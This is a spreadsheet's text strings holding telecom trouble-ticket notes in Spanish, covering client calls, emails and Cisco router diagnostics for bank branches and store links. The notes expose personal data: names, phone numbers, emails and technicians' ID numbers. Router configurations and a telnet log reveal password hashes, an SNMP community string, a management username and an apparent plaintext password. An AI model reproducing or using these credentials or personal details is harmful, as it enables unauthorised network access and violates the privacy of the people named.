  <si>
    <t>SE GENERA CODIGO EN ETA</t>
  </si>
  <si>
    <t>SE CAMBIA DE GRUPO WO PARA SEGUIMIENTO</t>
  </si>
  <si>
    <t>F4571644</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN CARLOS ROBLES 58794781 QUIEN CONFIRMA VISITA PARA EL LUNES A LAS  8:00 HRS
-ID 1001266030</t>
  </si>
  <si>
    <t>F4571660</t>
  </si>
  <si>
    <t>SE HABLÓ CON SERGIO GARCÍA/CLIENTE 00 525551745299 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4571667</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 20 DE MAYO DE 2022 14:24
PARA: TIC ORELLANA, FRANKLIN &lt;FRANKLIN.ORELLANA@BANRURAL.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; TIC - DIRECCION DE TELECOMUNICACIONES (LISTA) &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACES BANRURAL DOWN.
BUENAS TARDES ESTIMADOS (A)
COMO PARTE DEL SEGUIMIENTO AL CASO PARA LA AGENCIA CC_BANRURAL_GT_AGENCIA_0607, SOLICITAMOS DE SU AMABLE APOYO PARA VALIDAR SI PERSISTEN LOS INCONVENIENTES. SE REINICIA RUTA Y SE OBSERVA ENLACE NUEVAMENTE RESTABLECIDO. SALUDOS CORDIALES. GRACIAS DE ANTEMANO
FIGURA 1. PING DESDE CENTRAL HACIA LAN DE AGENCIA 607 CON ÉXITO
CC_BANRURAL_GT_AGENCIA_0033#PING VRF BANRURAL 10.136.7.17 REPEAT 100
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 100, 100-BYTE ICMP ECHOS TO 10.136.7.17, TIMEOUT IS 2 SECONDS:
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
SUCCESS RATE IS 100 PERCENT (100/100), ROUND-TRIP MIN/AVG/MAX = 1/3/9 MS</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CRONO ANTERIOR INDICA SERVICIO EN MONITOREO PARA LAS 12:00PM</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A FRANKLIN ORELLANA/CLIENTE, SE LE INDICA ENLACE OK, ÉSTE ASÍ LO CONFIRMA, PIDE MONITOREO PARA MAÑANA A LAS 12:00PM</t>
  </si>
  <si>
    <t>SE HABLÓ CON FRANKLIN ORELLANA/CLIENTE 25041690 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.
AGENCIA 607</t>
  </si>
  <si>
    <t>SE  LLAMA A CENTRAL PERO NO RESPONDEN, SE INTENTARA LUEGO
-ID 1001234027 - 1001234458</t>
  </si>
  <si>
    <t>F4571673</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE ANDREA CANO , A QUIEN SE LE INDICO QUE ES NECESARIO REALIZAR UNA VISITA TECNICA.
EL CLIENTE INDICA QUE HOY SE RETIRAN A LAS 16:00HRS POR LO QUE SOLICITA SE REALICE LA VISITA EL DIA LUNES.
NO LABORA FINES DE SEMANA.
1001222242
COLA:
NOMBRE: A: 40766548
NÚMERO: 011 50240766548
DURACIÓN: 0:00:12
ESTADO: CONECTADA
DETALLES: +50240766548
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 20/05/2022 14:24:43</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANDREA CANO AL 40766548 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001614474
**</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE ANDREA CANO QUIEN INDICA QUE LAS LLAMADAS SE ESTAN CORTANDO.</t>
  </si>
  <si>
    <t>F4571674</t>
  </si>
  <si>
    <t xml:space="preserve">  SE ENVIA CORREO A CLIENTE PARA QUE EVALUE Y PUEDA VALIDAR.
ASUNTO: REPORTE DE SATURACIÓN CON VILLAS MACKAY - BLV. MACKEY 192.168.70.0/24</t>
  </si>
  <si>
    <t>F4571675</t>
  </si>
  <si>
    <t>*** SE ENVIAN DATOS DE PERSONAL TÉCNICO A CLIENTE, A LA ESPERA DE QUE NOS AUTORICE LOS ACCESOS PARA DÍA LUNES ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: SÁBADO, 21 DE MAYO DE 2022 11:37
PARA: SANDRA.ALVARADO@SEGURIDAD.GOB.SV &lt;SANDRA.ALVARADO@SEGURIDAD.GOB.SV&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;
ASUNTO: FDOS. DE ACTVS. ESPS.DEL MIN. JUST. Y SEG. --- IP2124165SV --
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO, SE HAN GESTIONADO UNA VISITA TÉCNICA PARA LA VERIFICACIÓN DEL SERVICIO, FAVOR DE SU APOYO EN GESTIONAR ACCESOS PARA EL PERSONAL DESCRITO A CONTINUACIÓN:
00936126-7 4799 MARIO ERNESTO CRUZ MARQUEZ
00354722-1 4378 RONAL MOREL CRESPIN
00157708-4 4690 ABRAHAM SAMUEL PEREZ
03245714-4 8787 ADAN ERNESTO GONZALEZ
01101266-2 4605 JOSE SALVADOR PORTILLO VELASQUEZ
04086816-7 12404 GERARDO ANTONIO MINERO
05356271-8 KEVIN ERNESTO MEJIA
04271773-2 MIGUEL DUEÑAS
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>*** SE TRATÓ DE CONTACTAR CON CLIENTE SANDRA PERO NO SE LOGRA LA COMUNICACIÓN ***
1001367247
COLA:
NOMBRE: A: 0050325263697
NÚMERO: 0050325263697
DURACIÓN: 0:00:09
ESTADO: MARCANDO
DETALLES: 0050325263697
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ANGEL.TORRES
FECHA Y HORA LOCALES: 21/05/2022 11:38:40</t>
  </si>
  <si>
    <t>F4571676</t>
  </si>
  <si>
    <t>F4571698</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE HÉCTOR MACHAN 49120366 ID: 1001244833, CL COMENTA QUE LE ESTAN RESPONDIENDO 648 KBPS, CONECTA SOLO 1 EQUIPO E INDICA QUE LE RESPONDE 1.8 MBPS PERO TIENE SISTEMAS Y EQUIPOS EN CONSUMO, SE CONSULTA CON CNOC (ESAU SANDOVAL) Y COMENTAN QUE EL SERVICIO ESTA OK, CL DEBE DE REVISAR SU RED INTERNA POR POSIBLE SATURACION | CL AUTORIZA CIERRE DE TKT, SE NOTIFICA A SAMUEL.ESTRADAG VIA SKYPE | WIP</t>
  </si>
  <si>
    <t>F4571711</t>
  </si>
  <si>
    <t>REALIZAR PRUEBAS EDE 1 ER NIVEL EN HORARIO HABIL DE HOY</t>
  </si>
  <si>
    <t>F4571713</t>
  </si>
  <si>
    <t>SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 10 HORAS
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.3(3)M3, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2014 BY CISCO SYSTEMS, INC.
COMPILED WED 28-MAY-14 05:26 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.0(1R)M16, RELEASE SOFTWARE (FC1)
CC_GMG_GT_INTERNET_TIENDA_102 UPTIME IS 10 HOURS, 24 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "USBFLASH0:C1900-UNIVERSALK9-MZ.SPA.153-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784GB
6 GIGABIT ETHERNET INTERFACES
3 TERMINAL LINES
2 CELLULAR INTERFACES
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
249840K BYTES OF USB FLASH USBFLASH0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1921/K9          FTX184784GB
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
------------------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE                  TECHNOLOGY-PACKAGE
              CURRENT              TYPE           NEXT REBOOT
------------------------------------------------------------------------
IPBASE        IPBASEK9             PERMANENT      IPBASEK9
SECURITY      NONE                 NONE           NONE
DATA          NONE                 NONE           NONE
NTWKESS       NONE                 NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_GMG_GT_INTERNET_TIENDA_102#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3520 BYTES
!
VERSION 15.3
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_GMG_GT_INTERNET_TIENDA_102
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$TARP$5JXCWYTPQKA5ZOV.ZT0FT/
!
NO AAA NEW-MODEL
CLOCK TIMEZONE GUA -6 0
!
!
!
!
!
!
!
IP CEF
NO IPV6 CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CHAT-SCRIPT HSPA-R7 "" "AT!SCACT=1,1" TIMEOUT 60 "OK"
!
!
LICENSE UDI PID CISCO1921/K9 SN FTX184784GB
!
!
USERNAME GESTIONIP SECRET 5 $1$1RWQ$QJ.EATGV1/1KT0ACIDIN71
!
REDUNDANCY
!
!
CONTROLLER CELLULAR 0/1
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.158.187 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/313900313T/_/
 BANDWIDTH 10240
 IP ADDRESS 10.174.141.99 255.255.255.240
 IP VIRTUAL-REASSEMBLY IN
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 181.209.223.85 255.255.255.252
 IP VIRTUAL-REASSEMBLY IN
 RATE-LIMIT INPUT 10240000 1920000 3840000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 10240000 1920000 3840000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP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CELLULAR0/1/0
 NO IP ADDRESS
 ENCAPSULATION SLIP
 DIALER IN-BAND
 DIALER STRING HSPA-R7
!
INTERFACE CELLULAR0/1/1
 NO IP ADDRESS
 ENCAPSULATION SLIP
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 NO IP ADDRESS
 NO AUTOSTATE
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.174.141.97
!
LOGGING SOURCE-INTERFACE LOOPBACK5
!
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION ZONA 0 MERCADO MUNICIPAL, FRENTE AL PARQUE, SANTA CATALINA LA TINTA, ALTA VERAPAZ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0/1/0
 SCRIPT DIALER HSPA-R7
 NO EXEC
LINE 0/1/1
 NO EXEC
LINE VTY 0 4
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 20000 1000
!
END
CC_GMG_GT_INTERNET_TIENDA_102#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 34 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 34 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 37 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
*JAN  2 00:00:02.251: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
*MAY 20 16:51:49.123: C3600_SCP_SET_DSTADDR2_IDB(184)ADD = 80 NAME IS EMBEDDED-SERVICE-ENGINE0/0
*MAY 20 16:52:10.891: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 20 16:52:10.895: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 20 16:52:11.767: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
*MAY 20 16:52:11.891: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 20 16:52:11.895: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 20 16:52:16.003: %CELLWAN-2-SIM_FAILURE: [CELLULAR0/1/0]: SIM READ FAILED
*MAY 20 16:52:16.095: %CELLWAN-2-MODEM_UP: MODEM IN HWIC SLOT 0/1 IS NOW UP
*MAY 20 16:52:16.103: %USBFLASH-5-CHANGE: USBFLASH0 HAS BEEN INSERTED!
*MAY 20 10:52:18.579 GUA: %SYS-6-CLOCKUPDATE: SYSTEM CLOCK HAS BEEN UPDATED FROM 16:52:18 UTC FRI MAY 20 2022 TO 10:52:18 GUA FRI MAY 20 2022, CONFIGURED FROM CONSOLE BY CONSOLE.
*MAY 20 10:52:18.803 GUA: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*MAY 20 10:52:19.635 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*MAY 20 10:52:19.851 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
*MAY 20 10:52:20.623 GUA: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 20 10:52:20.623 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 20 10:52:20.727 GUA: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 20 10:52:20.727 GUA: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 20 10:52:20.727 GUA: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/0/2, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 20 10:52:20.727 GUA: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/0/3, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 20 10:52:21.631 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
*MAY 20 10:52:21.631 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 20 10:52:21.735 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY 20 10:52:21.735 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO DOWN
*MAY 20 10:52:21.735 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/2, CHANGED STATE TO DOWN
*MAY 20 10:52:21.735 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/3, CHANGED STATE TO DOWN
*MAY 20 10:52:23.003 GUA: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.3(3)M3, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2014 BY CISCO SYSTEMS, INC.
COMPILED WED 28-MAY-14 05:26 BY PROD_REL_TEAM
*MAY 20 10:52:23.051 GUA: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_GMG_GT_INTERNET_TIENDA_102 IS UNDERGOING A COLD START
*MAY 20 10:52:25.899 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 20 10:52:26.899 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 20 12:45:11.891 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 20 12:45:12.899 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 20 12:45:15.891 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 20 12:45:16.891 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
CC_GMG_GT_INTERNET_TIENDA_102#
SHOW CLOCK
*21:16:33.565 GUA FRI MAY 20 2022
CC_GMG_GT_INTERNET_TIENDA_102#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.174.141.97           0   C4B8.B4DE.16B8  ARPA   GIGABITETHERNET0/0
INTERNET  10.174.141.99           -   A0EC.F902.08A0  ARPA   GIGABITETHERNET0/0
INTERNET  181.209.223.85          -   A0EC.F902.08A1  ARPA   GIGABITETHERNET0/1
INTERNET  181.209.223.86          0   0C8D.DBAF.39F8  ARPA   GIGABITETHERNET0/1
CC_GMG_GT_INTERNET_TIENDA_102#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/313900313T/_/
GI0/1                          UP             UP       LAN DEL CLIENTE
GI0/0/0                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI0/0/1                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI0/0/2                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI0/0/3                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
CE0/1/0                        UP             UP
CE0/1/1                        DOWN           DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
CC_GMG_GT_INTERNET_TIENDA_102#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.174.141.99   YES NVRAM  UP                    UP
GIGABITETHERNET0/1         181.209.223.85  YES NVRAM  UP                    UP
GIGABITETHERNET0/0/0       UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0/1       UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0/2       UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0/3       UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
CELLULAR0/1/0              UNASSIGNED      YES UNSET  UP                    UP
CELLULAR0/1/1              UNASSIGNED      YES UNSET  DOWN                  DOWN
LOOPBACK5                  10.212.158.187  YES NVRAM  UP                    UP
VLAN1                      UNASSIGNED      YES UNSET  UP                    UP
CC_GMG_GT_INTERNET_TIENDA_102#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INTERNET_GT_DEPTAL 10.174.141.99
  PING 10.174.141.99: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.174.141.99 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 4/32/181 MS
RUTA IP:
PE: 10.179.28.6
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_DEPTAL 10.174.141.99
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_DEPTAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.174.141.99/32  DIRECT  0    0                 0.0.0.0         VLANIF2205</t>
  </si>
  <si>
    <t>F4571726</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE ZULEMA QUIEN NO APOYO A REVISAR LOS EQUIPOS Y SOLICITO VISITA TECNICA.
INDICA QUE SE RETIRAN A LAS 17:00HRS.
1001235728
COLA:
NOMBRE: A: 0050378778276
NÚMERO: 0050378778276
DURACIÓN: 0:00:09
ESTADO: MARCANDO
DETALLES: 0050378778276
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 20/05/2022 15:06:44</t>
  </si>
  <si>
    <t>F4571729</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, SE VALIDARÁ SERVICIO HASTA EL DÍA LUNES A LAS 11:00AM A SOLICITUD DE CLIENTE.</t>
  </si>
  <si>
    <t>F4571737</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS FUENTES-78555357 ##VIVO</t>
  </si>
  <si>
    <t>F4571769</t>
  </si>
  <si>
    <t>ENLACE RESTABLECE CORTE DE FIBRA TOTAL
&lt;QTZLGTLFN2T1E03A02EIM3&gt;PING -VPN-INSTANCE BANRURAL 10.72.112.63
  PING 10.72.112.63: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.72.112.63: BYTES=56 SEQUENCE=1 TTL=255 TIME=1 MS
    REPLY FROM 10.72.112.63: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 10.72.112.63: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 10.72.112.63: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 10.72.112.63: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 10.72.112.63 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
&lt;QTZLGTLFN2T1E03A02EIM3&gt;TELNET VPN-INSTANCE BANRURAL 10.72.112.63
TRYING 10.72.112.63 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.72.112.63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 LOGIN INVALID
USERNAME: GESTIONIP
PASSWORD:
CC_BANRURAL_GT_AGENCIA_0718&gt;NE7W0RKS
TRANSLATING "NE7W0RKS"...DOMAIN SERVER (255.255.255.255)
% BAD IP ADDRESS OR HOST NAME
TRANSLATING "NE7W0RKS"...DOMAIN SERVER (255.255.255.255)
 (255.255.255.255)
TRANSLATING "NE7W0RKS"...DOMAIN SERVER (255.255.255.255)
% UNKNOWN COMMAND OR COMPUTER NAME, OR UNABLE TO FIND COMPUTER ADDRESS
CC_BANRURAL_GT_AGENCIA_0718&gt;
CC_BANRURAL_GT_AGENCIA_0718&gt;ENA
PASSWORD:
CC_BANRURAL_GT_AGENCIA_0718#SHO IP INT BRIE
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.72.112.170   YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/1         10.72.112.63    YES NVRAM  UP                    UP
FASTETHERNET0/0/0          UNASSIGNED      YES UNSET  UP                    UP
FASTETHERNET0/0/1          UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
FASTETHERNET0/0/2          UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
FASTETHERNET0/0/3          UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
BVI1                       UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
LOOPBACK5                  10.212.124.201  YES NVRAM  UP                    UP
VLAN1                      10.167.18.126   YES NVRAM  UP                    UP
CC_BANRURAL_GT_AGENCIA_0718#SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.72.112.1             0   A4BE.2BE5.602F  ARPA   GIGABITETHERNET0/1
INTERNET  10.72.112.7            18   3458.40C8.98AC  ARPA   GIGABITETHERNET0/1
INTERNET  10.72.112.63            -   C067.AFDD.90E1  ARPA   GIGABITETHERNET0/1
INTERNET  10.137.18.17            -   C067.AFDD.90E3  ARPA   VLAN1
INTERNET  10.137.18.22            0   F08E.DB17.A8E2  ARPA   VLAN1
INTERNET  10.167.18.126           -   C067.AFDD.90E3  ARPA   VLAN1
CC_BANRURAL_GT_AGENCIA_0718#SHO RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3928 BYTES
!
VERSION 15.3
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_BANRURAL_GT_AGENCIA_0718
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 4 EFGGPN07/DWJB.UGZOURJMJZHPAPLRUWH/NVNVXUK6.
!
NO AAA NEW-MODEL
!
IP CEF
!
!
!
!
!
!
NO IPV6 CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
LICENSE UDI PID CISCO1941/K9 SN FTX173785F4
!
!
USERNAME GESTIONIP SECRET 4 J97D2KYDSNA1WFDCO/9OZ72YEJCXHSGT1W6FUL8O/O.
!
!
BRIDGE IRB
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.124.201 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN REDUNDANTE/_/8902073T/_/
 BANDWIDTH 512
 IP ADDRESS 10.72.112.170 255.255.255.128
 RATE-LIMIT INPUT 2048000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 2048000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 LOAD-INTERVAL 30
 SHUTDOWN
 DUPLEX FULL
 SPEED 100
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION WAN PRINCIPAL/_/8902072T/_/
 BANDWIDTH 4096
 IP ADDRESS 10.72.112.63 255.255.255.128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FASTETHERNET0/0/0
